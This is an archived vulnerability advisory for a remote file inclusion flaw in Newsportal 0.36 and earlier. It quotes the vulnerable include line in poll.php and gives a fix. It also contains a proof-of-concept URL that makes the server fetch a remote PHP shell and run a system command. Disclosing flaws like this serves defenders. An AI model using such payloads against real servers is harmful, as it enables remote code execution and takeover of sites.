Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: b06-2263.htm

Newsportal <= 0.36 Remote File Inclusion Vulnerability



Newsportal <= 0.36 Remote File Inclusion Vulnerability
Newsportal <= 0.36 Remote File Inclusion Vulnerability



Newsportal <= 0.36 Remote File Inclusion Vulnerability=0D
=0D
[+] Affected Software: Newsportal <= 0.36 + register_globals=on=0D
[+] Vendor: http://florian-amrhein.de/newsportal=0D 
[+] Contact. philipp.niedziela@gmx.de=0D 
[+] Vuln discovered by: Florian Amrhein=0D
[+] PoC by: Philipp Niedziela=0D
=0D
// CODE [newsportal]/extras/poll/poll.php --------------------------------------------=0D
=0D
=0D
=0D
=0D

=0D =0D

Lese Overview- und Artikeldaten ein...

=0D =0D VULN=0D include("$file_newsportal");=0D // <----- VULN=0D =0D $ns=OpenNNTPconnection($server,$port);=0D flush();=0D if ($ns != false) {=0D $headers = readOverview($ns,$group,1,true);=0D closeNNTPconnection($ns);=0D }=0D ?>=0D =0D

=0D =0D =0D =0D // CODE --------------------------------------------=0D =0D =0D [+] PoC:=0D =0D http://[url]/[pathtonewsportal]/extras/poll/poll.php?file_newsportal=http://localhost/phpshell.txt?cmd=uname -a=0D =0D [+] Solution: Upgrade to 0.37 || del. [newsportal]/extras/poll/poll.php=0D [+] Greets: Lenni :)=0D =0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH